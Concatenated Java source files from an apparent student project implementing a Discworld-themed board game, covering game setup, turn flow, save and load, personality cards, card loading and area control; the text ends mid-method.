assertTrue( theShades.toString().length() > 0 );
}
@Test public void testPlayerActions(){
//assertNotNull( new Action(Configuration.BROWN_CARD_1_SERGEANT_CHEERY_LITTLEBOTTOM) );
}
@Test
public void winningConditions(){
assertEquals( "10 bucks in bank", dpizar.calculateNetWorth(gameboard), gamest.calculateNetWorth(gameboard) );
dpizar.transferMoneyto(1, gamest);
assertNotEquals( "Player dpizar can transfer money to gamest" , dpizar.calculateNetWorth(gameboard), gamest.calculateNetWorth(gameboard) );
assertFalse("Player 2 has not winning conditions", gamest.checkWinningCondition(gameboard) );
assertFalse("Player 1 has not winning conditions", dpizar.checkWinningCondition(gameboard) );
/**
* The winning condition :
* - For <NAME>, he has to have 11 minions in a 2 players game.
*/
dpizar.putNewMinionOnBoard(2,false);
dpizar.putNewMinionOnBoard(3,false);
dpizar.putNewMinionOnBoard(4,false);
dpizar.putNewMinionOnBoard(6,false);
dpizar.putNewMinionOnBoard(8,false);
dpizar.putNewMinionOnBoard(9,false);
dpizar.putNewMinionOnBoard(10,false);
dpizar.putNewMinionOnBoard(11,false);
dpizar.putNewMinionOnBoard(12,false);
assertTrue(" <NAME> - played by dpizar - wins the game with 11 minions ", dpizar.checkWinningCondition(gameboard) );
}
@After
public void stops(){
}
@AfterClass
public static void teardown(){
}
}
<file_sep>package ca.concordia.game.main;
import java.util.ArrayList;
import java.util.Collections;
import java.util.HashMap;
import java.util.Map;
import java.util.Scanner;
import java.util.concurrent.atomic.AtomicInteger;
import ca.concordia.game.gameState.StateContext;
import ca.concordia.game.model.*;
import ca.concordia.game.util.*;
import ca.concordia.game.common.common;
import ca.concordia.game.common.common.Colors;
/**
* Game class creates a new game, loads and saves a game state. Further it
* specifies and controls the logic required to play a game.
*
* @author <NAME>
* @author <NAME>
* @author <NAME>
* @author <NAME> <NAME>
* @author <NAME>
*/
public class Game {
private static Game instance = null;
/**
* This will contain the state each player is at the moment.And the actions
* he can perform.
*/
private ArrayList<StateContext> playerStatus;
private Gameboard gameboard;
private Map<String, Deck> decks;
private Bank bank;
private Die die;
private ArrayList<Symbol> symbols;
public Scanner keyIn= new Scanner(System.in);;
public int currentPlayer;
public int numberOfPlayers;
private Player[] players;
/**
* This function initialiazes a new Game - Since the current player is not
* yet detemined, it sets currentPlayer to -1 - Creates a new Instance of
* Bank. Note the Bank has to be unique. - Initializes the balance to
* Initial Balance of 120. - Initializes the Scanner instance to be used in
* the game - Initializes the number of players via CLI
*/
public String init() {
currentPlayer = -1;
this.bank = Bank.getInstance();
bank.setBankMoney(new AtomicInteger(Configuration.DEFAULT_BALANCE));
System.out.println("Please select number of players(Maximun => 4):");
numberOfPlayers = keyIn.nextInt();
this.symbols = new ArrayList<Symbol>();
//All symbols are initialize in the Green or Brown card classes.
// Close Scanner object
// keyIn.close();//Don't close until done using in whole proyect.
this.decks = new HashMap<String, Deck>();
this.decks.put("discard", new Deck("D", numberOfPlayers));
this.decks.put("personalities", new Deck("P", numberOfPlayers));
this.decks.put("events", new Deck("E", numberOfPlayers));
this.decks.put("green", new Deck("G", numberOfPlayers));
this.decks.put("brown", new Deck("B", numberOfPlayers));
// Select number of players and their colors.
// For now we use four players of fixed colors:
this.players = new Player[numberOfPlayers];
for (int i = 0; i < numberOfPlayers; i++) {
this.players[i] = new Player((PersonalityCard) decks.get("personalities").getCard(),
Colors.colorForIndex(i), 12, 6);
// Deal 5 green cards to each player:
decks.get("green").dealCardsToPlayer(players[i], 5);
// Give $10 to each player:
bank.transferFunds(players[i], 10);
}
// Depending on the number of players initialize their States(to wait).
playerStatus = new ArrayList<StateContext>();// put on heap.
for (int i = 0; i < numberOfPlayers; i++) {
playerStatus.add(new StateContext());
System.out.println("Player:" + players[i].getColor() + " Current State:" + playerStatus.get(i).getState());
/**
* Set to next state(Play State.)So players are ready to play when
* their turn comes up.
*/
playerStatus.get(i).performAction(players[i], this);
}
// Initialize Gameboard:
this.gameboard = new Gameboard(this.players);
this.die = new Die();
return "Initialization was succssessfull";
}
// Start playing game instance.
public void play(boolean loadedGame) {
if(!loadedGame)//If the game was not loaded.
{
Map<Integer, Colors> playerDieRollMap = new HashMap<Integer, Colors>();
ArrayList<Integer> playerDieRoll = new ArrayList<Integer>();
int rollValue = -1;
// roll dice for each player to pick first player.
for (int i = 0; i < this.numberOfPlayers; i++) {
rollValue = die.roll();// roll dice for player.
System.out.println("Player with color: " + this.players[i].getColor() + " rolled:" + rollValue);
playerDieRoll.add(rollValue);// store value gotten by player.
/**
* Store Player color,roll value pair.
*/
playerDieRollMap.put(rollValue, this.players[i].getColor());
}
int highestRoll = highestValue(playerDieRoll);
Colors startingColor = playerDieRollMap.get(highestRoll);
System.out.println("The player with the color:" + startingColor + " starts the game.");
// Set the pointer to the starting player in the array.
for (int i = 0; i < this.numberOfPlayers; i++) {
// Found a match
if (this.players[i].getColor().equals(startingColor)) {
currentPlayer = i;
break;
}
}
}
// Keep going until a player wins the game.
while (true){
System.out.println();
System.out.println("**************************************Game has begun!!!!!!************************************");
System.out.println();
// Start Playing select the player who's turn it is.
this.playerStatus.get(currentPlayer).performAction(players[currentPlayer], this);
System.out.println("Player:" + players[currentPlayer].getColor() + " Current State:"
+ playerStatus.get(currentPlayer).getState());
// Draw Cards State
this.playerStatus.get(currentPlayer).performAction(players[currentPlayer], this);
System.out.println("Player:" + players[currentPlayer].getColor() + " Current State:"
+ playerStatus.get(currentPlayer).getState());
this.playerStatus.get(currentPlayer).performAction(players[currentPlayer], this);
System.out.println("Player:" + players[currentPlayer].getColor() + " Current State:"
+ playerStatus.get(currentPlayer).getState());
currentPlayer = nextPlayer();
System.out.println("Do you wish to exit?? Enter -1, otherwise enter 1.");
int exit = this.keyIn.nextInt();
if (exit < 1) {
break;
}
}
System.out.println("Do you wish to save the current game?");
String save=this.keyIn.next();
if(save.contains("y"))
{
System.out.println("Preparing to save game.");
this.saveGame();
}else
{
System.out.println("You chose not to save the game.The game state has been lost.");
}
//don't close beacue a game might be loaded.
//this.keyIn.close();
}
/**
* Return the highest value in an Arraylist of integers.
* @param arrayList (ArrayList<Integer>)
* @return int
*/
public int highestValue(ArrayList<Integer> arrayList) {
Collections.sort(arrayList); // Sort the arraylist
int highest = arrayList.get(arrayList.size() - 1);
return highest;
}
/**
* Implements Game as a singleton, as there will always be a single game per run.
* @return Game
*/
public static Game getInstance() {
if( instance == null ){
instance = new Game();
}
return instance;
}
/**
* Constructor, initializes a new game.
*/
protected Game() { }
/**
* @deprecated - this object comparator has not been used, and should retire
* @param gameState
* @return
*/
public boolean equals(Game gameState) {
return false;
}
/**
* This function - Sets currentPlayer - Returns the player who's turn is up.
*
* @return int currentPlayer
*/
public int nextPlayer() {
currentPlayer = (currentPlayer + 1) % numberOfPlayers;
return currentPlayer;
}
/**
* Save game State.In the correct format.
*/
public String saveGame() {
//temporal variables.
String temp = "";
ArrayList<String> content = new ArrayList<String>();
BrownCard bCard;
GreenCard gCard;
// Store GameBoard's Info.
for (int i = 0; i < 12; i++) {
temp = temp + this.gameboard.getAreas().get(i).getCityCard().getName() + ",";
temp = temp + this.gameboard.getAreas().get(i).getTroubleMarker() + ",";
temp = temp + this.gameboard.getAreas().get(i).getBuildingColor() + ",";
temp = temp + this.gameboard.getAreas().get(i).getDemon() + ",";
temp = temp + this.gameboard.getAreas().get(i).getTroll() + ",";
// Get Minions of each class
for (int j = 0; j < this.gameboard.getAreas().get(i).getMinions().size(); j++) {
temp = temp + this.gameboard.getAreas().get(i).getMinions().get(j).getColor() + ",";
}
// remove last coma
temp = removeLastChar(temp);
// Store new Area info into the content array
content.add(temp);
temp = "";
}
// Store Player's Info.
temp = temp + this.players.length;// Get totalNumber of players.
content.add(temp);
temp = "";
for (int i = 0; i < this.players.length; i++) {
int personalityId=((PersonalityCard) this.players[i].getPersonality()).getCardId() -1;
temp = temp + personalityId + ",";
temp = temp + this.players[i].getColor() + ",";
temp = temp + this.players[i].getMinionsOnHand() + ",";
temp = temp + this.players[i].getBuildingOnHand() + ",";
temp = temp + this.players[i].getMoney() + ",";
temp = temp + this.players[i].getPlayerCards().size() + ",";
for (int j = 0; j < this.players[i].getPlayerCards().size(); j++) {
if (this.players[i].getPlayerCards().get(j).getClass().toString().contains("BrownCard")) {
// The card is of type BrownCard, convert to brown card.
bCard = (BrownCard) this.players[i].getPlayerCards().get(j);
temp = temp + bCard.getNumber() + ",";
} else if (this.players[i].getPlayerCards().get(j).getClass().toString().contains("GreenCard")){
// The card is of type GreenCard, convert to green card.
gCard = (GreenCard) this.players[i].getPlayerCards().get(j);
temp = temp + gCard.getNumber() + ",";
}else
{
System.out.println("ERROR(Class Game,function saveGame):The card is not of either Brown or green color.");
}
}
temp = temp + this.players[i].getPlayerCityCard().size() + ",";
for (int j = 0; j < this.players[i].getPlayerCityCard().size(); j++) {
temp = temp + this.players[i].getPlayerCityCard().get(j).getCardNumber() + ",";
}
// remove last character(the coma)
temp = removeLastChar(temp);
// Add new player line to ArrayList.
content.add(temp);
temp = "";
}
temp = "";
// Add the banks current bank balance to arraylist content.
temp = temp + this.bank.getTotal();
content.add(temp);
// Write current game's state to
Saver.saveGameState(content);
return "Save Was Successfull";
}
/**
* Remove last character of a string if it's a coma.
*
* @param str
* @return
*/
public String removeLastChar(String str) {
if (str.length() > 0 && str.charAt(str.length() - 1) == ',') {
str = str.substring(0, str.length() - 1);
}
return str;
}
/**
* Load a Game State from a txt. file.
*/
public String loadGame() {
ArrayList<String> content = new ArrayList<String>();
// Load SavedGame
// Create Scanner Object
String savedGame = "";
System.out.println("Please enter the name of the file you wish to load:");
savedGame = this.keyIn.next();
// input.close();
// Load new gameState into arraylist.
content = Loader.loadGameState(savedGame);
this.gameboard=new Gameboard();
this.gameboard.resetAreas();// erase last state of the areas.
// Parse Data and create new gameState.
// temporary variables.
String areaName = null;
boolean troubleMarker = false;
//boolean building = false;
Colors buildingColor = Colors.NONE;
int demon = 0;
int troll = 0;
//Load all areas.
for (int i = 0; i < 12; i++) {
// Array that will contain the color of the minions on a certain
// area.
ArrayList<Colors> minions = new ArrayList<Colors>();
String[] parts = content.get(i).split(",");
for (int j = 0; j < parts.length; j++) {
if (j == 0)
areaName = parts[j];
else if (j == 1)
troubleMarker = Boolean.valueOf(parts[j]);
else if (j == 2)
buildingColor = Colors.valueOf(parts[j]);
else if (j == 3)
demon = Integer.parseInt(parts[j]);
else if (j == 4)
troll = Integer.parseInt(parts[j]);
else
minions.add(Colors.colorForString(parts[j]));
}
// Create new city card with the name extracted.
CityCard cityCard = new CityCard(i);
// Create Area and add to gameboard.
Area area = new Area(cityCard, troubleMarker,buildingColor, demon, troll);
// (cityCard,troubleMarker,building,demon,troll) ==> Constructor
// parameters.
this.gameboard.addArea(area);
this.gameboard.addCityCard(cityCard);
// Add the minions that where in the current area.
for (int j = 0; j < minions.size(); j++)
area.addMinion(new Piece(minions.get(j)),true);
}
// savedGame="Test.txt";
// Get Number of Players(Always at line 12(in array))
int numberPlayers = Integer.parseInt(content.get(12));
this.numberOfPlayers = numberPlayers;
/**
* Parse PLayers information. Reset Last state of players.
*/
this.players = null;
// Set new number players.
this.players = new Player[numberPlayers];
PersonalityCard perCard = null;
Colors color = null;
int minionOnHand = 0;
int buildingOnHand = 0;
int money = 0;
int NumplayerCards = 0;
int NumcityCards = 0;
this.decks = new HashMap<String, Deck>();
this.decks.clear();//erase all previous decks.
//Initialize all decks for this loaded game.
this.decks.put("discard", new Deck("D", this.numberOfPlayers));
this.decks.put("personalities", new Deck("P", this.numberOfPlayers));
this.decks.put("events", new Deck("E", this.numberOfPlayers));
this.decks.put("green", new Deck("G", this.numberOfPlayers));
this.decks.put("brown", new Deck("B", this.numberOfPlayers));
// Start at position 13 after areas and # of players.
for (int i = common.beginingOfPlayersLoadGame; i < common.beginingOfPlayersLoadGame + numberPlayers; i++)
{
String[] parts = content.get(i).split(",");
int playerIndex = i % common.beginingOfPlayersLoadGame;// Index for array players, it starts at 0.
for (int j = 0; j < parts.length; j++) {
if (j == 0)
perCard = new PersonalityCard(Integer.parseInt(parts[j]),this.numberOfPlayers);
else if (j == 1)
color = Colors.colorForString(parts[j]);
else if (j == 2)
minionOnHand = Integer.parseInt(parts[j]);
else if (j == 3)
buildingOnHand = Integer.parseInt(parts[j]);
else if (j == 4)
money = Integer.parseInt(parts[j]);
else if (j == 5) {
NumplayerCards = Integer.parseInt(parts[j]);
} else if (j == (5 + NumplayerCards) + 1) {
NumcityCards = Integer.parseInt(parts[j]);
}
}
//Remove Personality card from City card deck.
Deck personalities=this.decks.get("personalities");
boolean success=personalities.deleteCard(perCard);
if(!success)
System.out.println("Personality Card couldn't be removed from the personality deck.(Class Game-Fucntion LoadGame)");
//System.out.println(personalities.getSizeDeck());
//personalities.displayCardsinDeck(personalities.getSizeDeck());
// Create and add new Player
this.players[playerIndex] = new Player(perCard, color, minionOnHand, buildingOnHand, money);
// Add player'sCards
for (int j = 0; j < NumplayerCards; j++) {
// Brown cards have int values of 1-53 and green cards have
// int values of 54-101.
int checkColor = Integer.parseInt(parts[(5 + j) + 1]);
Card card = new Card(false, false); // City cards are always
// visible.
if (checkColor < 54)// This is a Brown card
card = new BrownCard(checkColor);
else if (checkColor >= 54)
card = new GreenCard(checkColor);
this.players[playerIndex].receiveCard(card);
}
Deck deck=null;
//remove all the cards the player just received from the correct deck.
for(int j = 0;j<this.players[playerIndex].getPlayerCards().size();j++)
{
if(this.players[playerIndex].getPlayerCards().get(j).getClass().toString().contains("GreenCard"))
{
deck=this.getEspecificDeck("green");
success=deck.deleteCard(this.players[playerIndex].getPlayerCards().get(j));//TODO:check if it returns true.
if(!success)
System.out.println("Green Card couldn't be removed from the Green deck.(Class Game-Fucntion LoadGame)");
}else if(this.players[playerIndex].getPlayerCards().get(j).getClass().toString().contains("BrownCard"))
{
deck=this.getEspecificDeck("brown");
deck.deleteCard(this.players[playerIndex].getPlayerCards().get(j));//TODO:check if it returns true.
}
}
// Add CityCards.
for (int j = 0; j < NumcityCards; j++) {
// Get CityCard number.
int cardNumber = Integer.parseInt(parts[(5 + NumplayerCards + (j + 1)) + 1]);
//Get corresponding cityCard
CityCard cityCard=this.gameboard.getAreaByCityCard(cardNumber).getCityCard();
//delete city card from beard and give it to the player.
this.gameboard.deleteCardFromDeck(cityCard);
this.players[playerIndex].receiveCityCard(cityCard);
}
}// PLayers
/** Parse BankMoney Get money bank has. **/
this.bank = Bank.getInstance();
int bankMoney = Integer.parseInt(content.get(13+this.numberOfPlayers));
AtomicInteger aInt = new AtomicInteger(bankMoney);
this.bank.setBankMoney(aInt);// Set new bank balance.
this.currentPlayer=0;
//Create new die.
this.die = new Die();
// Depending on the number of players initialize their States(to wait).
playerStatus = new ArrayList<StateContext>();// put on heap.
this.playerStatus.clear();
this.playerStatus = new ArrayList<StateContext>();// put on heap.
for (int i = 0; i < numberOfPlayers; i++) {
playerStatus.add(new StateContext());
System.out.println("Player:" + players[i].getColor() + " Current State:" + playerStatus.get(i).getState());
/**
* Set to next state(Play State.)So players are ready to play when
* their turn comes up.
*/
playerStatus.get(i).performAction(players[i], this);
}
//Update all the player's hand(minions on play). Put all the minions a player has on the board.
ArrayList<Area> areas=this.gameboard.getAreas();
ArrayList<Piece>pieces;
Player selectPlayer;
for(int i=0;i<areas.size();i++ )
{
pieces = areas.get(i).getMinions();
for(int j=0;j<pieces.size();j++)
{
selectPlayer= this.getPlayerByColor(pieces.get(j).getColor());
selectPlayer.putNewMinionOnBoard(areas.get(i).getCityCard().getCardNumber(),true);
}
}
return "Load Was Successfull";
}
/**
* Get a Player using a color.
*
* @param color
* (Color)
* @return Player
*/
public Player getPlayerByColor(Colors color) {
// Select player with passed color.
for (int i = 0; i < this.players.length; i++) {
if (players[i].getColor().equals(color)) {
return players[i];
}
}
return null;
}
/**
* Prints Information about current game.
*/
public void printCurrentState() {
System.out.println("Current Game Status:" + "\n");
System.out.println("Number Of Players:" + this.numberOfPlayers);
System.out.println("Bank balance:" + this.bank.getTotal() + "\n");
System.out.println("Players:");
for (int i = 0; i < this.players.length; i++) {
System.out.println();
System.out.println("Player" + (i + 1) + ":");
System.out.println("Money: "+this.players[i].getMoney());
System.out.println("NetWorth: "+this.players[i].calculateNetWorth(this.gameboard));
System.out.println("Player: "+this.players[i].getColor()+" has buldings in the following areas:");
for(int j=0;j<this.gameboard.getAreas().size();j++)
{
if(this.players[i].getColor().equals(this.gameboard.getAreas().get(j).getBuildingColor()))
System.out.println("Area: "+this.gameboard.getAreas().get(j).getCityCard().getName()+" ;Building Cost:"+this.gameboard.getAreas().get(j).getCityCard().getBuldingCost());
}
//System.out.println(this.players[i].toString());
}/*
System.out.println("Game Board State:");
System.out.println(this.gameboard.toString());
*/
}
// Getters
/**
* Getter: array with players.
*
* @return Player[]
*/
public Player[] getPlayers() {
return this.players;
}
/**
* Getter: the decks from the game.
*
* @return Map<String, Deck>
*/
public Map<String, Deck> getDecks() {
return this.decks;
}
/**
* Getter: the requested deck.
*
* @param whichDeck
* @return Deck
*/
public Deck getEspecificDeck(String whichDeck) {
return this.decks.get(whichDeck);
}
/**
* Getter: Game Die.
*
* @return Die
*/
public Die getDie() {
return this.die;
}
/**
* Getter: Returns number of players
*
* @return int
*/
public int getNumberOfPlayers() {
return this.numberOfPlayers;
}
/**
* Getter: the size of the brown deck.
*
* @return int
*/
public int getSizeDrawDeck() {
/**
* Get the size of the brown deck since it's on the bottom and can give
* us the status of the draw deck is empty.
*/
Deck brownDeck = this.decks.get("Brown");
return brownDeck.getSizeDeck();
}
/**
* Getter: the game's current GameBoard.
*
* @return Gameboard
*/
public Gameboard getGameBoard() {
return this.gameboard;
}
/**
* Getter: Get index of current player.
*
* @return int
*/
public int getCurrentPlayer() {
return this.currentPlayer;
}
/**
* Calculate who won the Game. Called when the the brown deck is empty or when the event card Riots is activated and there are 8 or more trouble markers on the gameboard.
*/
public void CalculateAWinner()
{
double canPay=0;
for(int i=0;i< this.players.length;i++)
{
if(players[i].getLoan()>0)
{//Player has loans
canPay=Math.floor(players[i].getLoan()/players[i].getMoney());
System.out.println("Player: "+players[i].getColor()+ " can pay for: "+canPay +" of the loans he took.");
players[i].payLoan((int)canPay*12);//Pay available loans
if(players[i].getLoan()>0)//If he still has loans but can't pay substract 15 points
{
players[i].setMoney(players[i].getMoney()-15);
players[i].setloan(0);
}
//Calculate networth
int netWorth=players[i].calculateNetWorth(this.gameboard);
//Calculate minions on the board.
int numMinions=12-players[i].getMinionsOnHand();
int points=netWorth+numMinions;
System.out.println("Player: "+players[i].getColor()+" has a total of: "+points+ "points.");
}
System.out.println("The player with the highest points is the winner. Congratulations.");
}
}
}
<file_sep>package ca.concordia.game.model;
import ca.concordia.game.common.common.Colors;
/**
* This class will only contain the color of the Piece.
* @author <NAME>
* @author <NAME>
* @author <NAME>
* @author <NAME>
* @author <NAME>
*/
public class Piece {
private Colors color;
/**
* Contructor
* @param color
*/
public Piece(Colors color)
{
this.color=color;
}
/**
* Getter color of current piece(Minion).
* @return
*/
public Colors getColor()
{
return this.color;
}
/**
* toString method for class Color.
*/
@Override
public String toString(){
if( this.color instanceof Colors )
return "Color: " + this.color.toString();
return "Color is missing";
}
}
<file_sep>package ca.concordia.game.model;
/**
*PersonalityCard is a card that contains seven possible personalities that players could get.
*Each PersonalityCard has a specific winning condition for each personality it represents.
*
*
*@author <NAME>
*@author <NAME>
*@author <NAME>
*@author <NAME>
*@author <NAME>
*/
public class PersonalityCard extends Card {
public String winningConditionDescription = null;
private int cardId;
private int numberOfPlayers;
private boolean numPlayActive;
private int numMinionsOnAreas;
private int controlAreas;
private int numTroubleMarkers;
private int netWorth;
private int drawPile;
/**
* Constructor deending on the integer sent it creates one of the seven different personality cards.
* @param int i - Lord Identifier
*/
public PersonalityCard(int i,int numberOfPlayers) {
//Personality Cards are not Playable or Visible!
super(false,false);
this.numberOfPlayers=numberOfPlayers;//set number of players for winning conditions.
//not all winning conditions require the same variables.
this.numPlayActive=false;
this.numMinionsOnAreas=-1;
this.controlAreas=-1;
this.numTroubleMarkers=-1;
this.netWorth=-1;
this.drawPile=-1;
switch(i) {
case 0:
this.setName("Lord Vetinari");
this.cardId=1;
this.winningConditionDescription = "Has minions on different areas that don't have demons on them.2 players-11 areas,3 players-10 areas,4 players-9 areas";
this.numPlayActive=true;
//Set winning condition depending on number of players.
if( numberOfPlayers == 2 )
this.numMinionsOnAreas = 11;
else if(numberOfPlayers ==3 )
this.numMinionsOnAreas=10;
else if(numberOfPlayers == 4 )
this.numMinionsOnAreas = 9;
break;
case 1:
this.setName("<NAME>");
this.winningConditionDescription="If at the start of your turn you have clear control of a certain number of areas then you win the game immediately. With two players you need to control seven areas, with three players you need to control five areas, and with four players you need to control four areas.";
this.cardId=2;
this.numPlayActive=true;
//Set winning condition depending on number of players.
if(numberOfPlayers ==2)
this.controlAreas=7;
else if(numberOfPlayers ==3)
this.controlAreas=5;
else if(numberOfPlayers ==4)
this.controlAreas=4;
break;
case 2:
this.setName("Dragon King of Arms");
this.cardId=3;
this.winningConditionDescription = "If at the start of your turn there are 8 or more trouble markers on the board then you win the game immediately";
this.numTroubleMarkers=8;
break;
case 3:
this.setName("<NAME>");
this.cardId=4;
this.numPlayActive=true;
this.winningConditionDescription ="If at the start of your turn you have clear control of a certain number of areas then you win the game immediately. With two players you need to control seven areas, with three players you need to control five areas, and with four players you need to control four areas";
//Set winning condition depending on number of players.
if(numberOfPlayers ==2)
this.controlAreas=7;
else if(numberOfPlayers ==3)
this.controlAreas=5;
else if(numberOfPlayers ==4)
this.controlAreas=4;
break;
case 4:
this.setName("<NAME>");
this.winningConditionDescription="If the game ends due to the cards running out then you win the game.";
this.cardId=5;
this.winningConditionDescription="Draw Pile Exhausted.";
this.drawPile=0;
break;
case 5:
this.setName("<NAME>");
this.winningConditionDescription="Control If at the start of your turn you have clear control of a certain number of areas then you win the game immediately. With two players you need to control seven areas, with three players you need to control five areas, and with four players you need to control four areas";
this.cardId=6;
this.numPlayActive=true;
//Set winning condition depending on number of players.
if(numberOfPlayers ==2)
this.controlAreas=7;
else if(numberOfPlayers ==3)
this.controlAreas=5;
else if(numberOfPlayers ==4)
this.controlAreas=4;
break;
case 6:
this.setName("Chrysoprase");
this.winningConditionDescription="If at the start of your turn you have a combined worth of $50 or more (money in hand plus buildings you have built), then you win the game. Each loan you have counts as $ 12 against your total.";
this.cardId=7;
this.netWorth=50;
break;
default:
System.out.println("Initializing Personality Card with the wrong index");
break;
}
}
/**
* Getter : returns the number of trouble markers in the board required to win a game.
* @return int
*/
public int getNumTroubleMarkers()
{
return this.numTroubleMarkers;
}
/**
* Getter: returns the number of controlled areas required to win the game.
* @return int
*/
public int getControlledAreas()
{
return this.controlAreas;
}
/**
* Getter: returns the number of areas with a minion that are required to win.
* @return int
*/
public int getNumMinionsOnAreas()
{
return this.numMinionsOnAreas;
}
/**
* Getter: cardID
* @return int
*/
public int getCardId()
{
return this.cardId;
}
/**
* ToString method.
* @return String
*/
public String toString()
{
return this.getName()+":" +this.winningConditionDescription;
}
/**
* Getter: winning conditions description.
* @return String
*/
public String getWinningConditionDescription()
{
return this.winningConditionDescription;
}
}
<file_sep>package ca.concordia.game.util;
import java.util.ArrayList;
import java.util.HashMap;
import java.util.Map;
import java.util.Map.Entry;
import ca.concordia.game.common.common.Colors;
import ca.concordia.game.model.BrownCard;
import ca.concordia.game.model.GreenCard;
public class CardLoader {
private static CardLoader instance = null;
private ArrayList<String> cards;
private String temp;
/**
* The first card, works with raw string, and the second works with real objects
* Using the Map<Integer, String>
* Using the Map<Integer, Card>
*/
private Map<Integer, String> mcards;
private Map<Integer, BrownCard> brownCards;
private Map<Integer, GreenCard> greenCards;
/**
* Implements CardLoader as a singleton.
* @return CardLoader
*/
public static CardLoader getInstance() {
if(instance == null) {
instance = new CardLoader();
}
return instance;
}
/**
* This constructor loads Green and Blue cards into re-usable data structures
*/
protected CardLoader() {
String data = "";
int index = -1;
cards = new ArrayList<String>();
mcards = new HashMap<Integer, String>();//
greenCards = new HashMap<Integer, GreenCard>();
brownCards = new HashMap<Integer, BrownCard>();
cards.ensureCapacity( Configuration.PLAYER_PROPERTIES.size() );
for( Entry<Object, Object> property : Configuration.PLAYER_PROPERTIES.entrySet() ){
data = property.getValue().toString();
String[] extracted = data.split("\\|");
index = Integer.parseInt( extracted[0] );
int number = index;
String name = extracted[2];
Colors color = extracted[1] == "B" ? Colors.BROWN : Colors.GREEN;
String ability = extracted.length >= 6 ? extracted[5] : "";
if( color == Colors.BROWN ){
//brownCards.put(new Integer(index), new BrownCard(index, name, color, ability));
}else{
//greenCards.put(new Integer(index), new GreenCard(index, name, color, ability));
}
mcards.put( new Integer(index) , data );
}
}
public String nameForCard(int i, char type){
temp = "";
getCard(i,type);//Get card.
if(temp.contains("Index doesn't exist:"))
return temp;
String resp = "NO NAME AVAILABLE";
if( temp.isEmpty() ){
return resp;
}
String[] arr = temp.split("\\|");
if( arr.length > 2 ){
resp = arr[2];
}
return resp;
}
public String abilityForCard(int i,char type){
temp = "";
getCard(i,type);//Get card.
if(temp.contains("Index doesn't exist:")){
return temp;
}
String resp = "NO ABILITY AVAILABLE";
String[] arr = temp.split("\\|");
if( arr.length > 5 ){
resp = arr[5];
}
return resp;
}
public String symbolsForCard(int i,char type){
temp = "";
getCard(i,type);//Get card.
if(temp.contains("Index doesn't exist:")){
return temp;
}
String resp = "NO Symbols AVAILABLE";
String[] arr = temp.split("\\|");
if(arr.length > 4){
resp = arr[4];
}
return resp;
}
/**
* GetCard returns the respective card information based on the card id(i) and the type of the card(type).
* @param i(int)
* @param type(String)
* @return String
*/
private void getCard(int i,char type) {
temp = "";
switch(type) {
case 'B':
if (i > 0) {
temp = mcards.get( i );
}
break;
case 'G':
if(i >= 54) {
temp = mcards.get(i);
} else {
temp= "Index doesn't exist: " + i;
}
break;
default:
break;
}
}
}
<file_sep>package ca.concordia.game.model;
import java.util.HashMap;
import java.util.Map;
import java.util.ArrayList;
import java.util.Map.Entry;
import ca.concordia.game.common.common.Colors;
/**
* Class Area contains the possible object that could be available to an area.
*
* @author <NAME>
* @author <NAME>
* @author <NAME>
* @author <NAME>
* @author <NAME>
*/
//TODO: Come up with a way to set restrictions on area when a demon is on it.
public class Area {
private CityCard cityCard;//A city card belongs to an Area.
private ArrayList<Piece> minions;
private boolean troubleMarker;
private boolean building;
private Colors buildingColor;
private int demon;
private int troll;
/**
* Constructor for new game.
* @param cityCard
*/
public Area(CityCard cityCard)
{
this.cityCard = cityCard;
this.troubleMarker = false;
this.building = false;
this.buildingColor = Colors.NONE;
this.demon = 0;
this.troll = 0;
minions= new ArrayList<Piece>();
}
/**
* Constructor for loaded game. Reset everything.
* @param cityCard
* @param troubleMarker
* @param building
* @param demon
* @param troll
*/
public Area(CityCard cityCard,boolean troubleMarker,Colors buildingColor,int demon,int troll)
{
this.cityCard=cityCard;
this.troubleMarker=troubleMarker;
//Modify this.building=building;
this.buildingColor=buildingColor;
if(this.buildingColor.equals(Colors.NONE))
this.building=false;
else
this.building=true;
this.demon=demon;
if(this.demon>0)
this.getCityCard().setIsActive(false);//Make city card not active
this.troll=troll;
minions= new ArrayList<Piece>();
}
/**
* Checks if the color of a player controls the area.Returns true if it does otherwise it returns false.
* @param color(Colors)
* @return boolean
*/
public boolean controlsArea(Colors color)
{
//Map will contain the number of minions from each player currently on this area.
Map<Colors,Integer> playerMinions=new HashMap<Colors,Integer>();
//All possible players.
playerMinions.put(Colors.RED, new Integer(0));
playerMinions.put(Colors.BLUE,new Integer(0));
playerMinions.put(Colors.YELLOW, new Integer(0));
playerMinions.put(Colors.GREEN, new Integer(0));
Colors currentColor= Colors.NONE;
for(int i=0;i<this.minions.size();i++)
{
currentColor=this.minions.get(i).getColor();
playerMinions.put(currentColor,playerMinions.get(currentColor)+1);
}
if(this.building)//if true a building exists
{
int number= playerMinions.get(buildingColor);
number=number+1;
playerMinions.put(buildingColor, number);
}
//Get the entry with the maximum value in the HashMap.
Entry<Colors,Integer> maxEntry = null;
for(Entry<Colors,Integer> entry : playerMinions.entrySet()) {
if (maxEntry == null || entry.getValue() > maxEntry.getValue()) {
maxEntry = entry;
}
}
//check if there's a player with the same number of playing pieces.
playerMinions.remove(maxEntry.getKey());
Entry<Colors,Integer> maxEntry2 = null;
for(Entry<Colors,Integer> entry : playerMinions.entrySet()) {
if (maxEntry2 == null || entry.getValue() > maxEntry2.getValue()) {
maxEntry2 = entry;
}
}
//If two or more players have the same number of playing pieces then no one controls the area. Or if there is an equal or greater number of trolls
//than player pieces in the current area then there's no control of the area.
if(maxEntry.getValue() == maxEntry2.getValue() || maxEntry.getValue()< this.troll)
{
return false;
}
//Check if the color of the player being checked is the same as the one that has the most playing cards on the area.
if(maxEntry.getKey()==color)
return true;
else
return false;
}
/**
* Getter
* @return CityCard
*/
public CityCard getCityCard()
{
return this.cityCard;
}
/**
* Getter
* @return boolean
*/
public boolean getTroubleMarker()
{
return this.troubleMarker;
}
/**
* Getter
* @return boolean
*/
public boolean getBuilding()
{
return this.building;
}
/**
* Getter
* @return int
*/
public int getDemon()
{
return this.demon;
}
/**
* Getter
* @return int
*/
public int getTroll()
{
return this.troll;
}
/**
* Getter
* @return ArrayList<Piece>
*/
public ArrayList<Piece> getMinions()
{
return this.minions;
}
/**
* Getter
* @return Colors
*/
public Colors getBuildingColor()
{
return this.buildingColor;
}
/**
*
* toString method for Area Class.
*/
@Override
public String toString()
{
String info="Area Name: "+ this.cityCard.getName()+" ." + " Trouble Marker: "+this.troubleMarker+". Building: "+this.building+" ."+ " Building Color: "+this.buildingColor+" .";
info= info+ " Demons: "+this.demon+ ". Trolls: "+this.troll +" .\n";
String info2="Minions in current area: ";
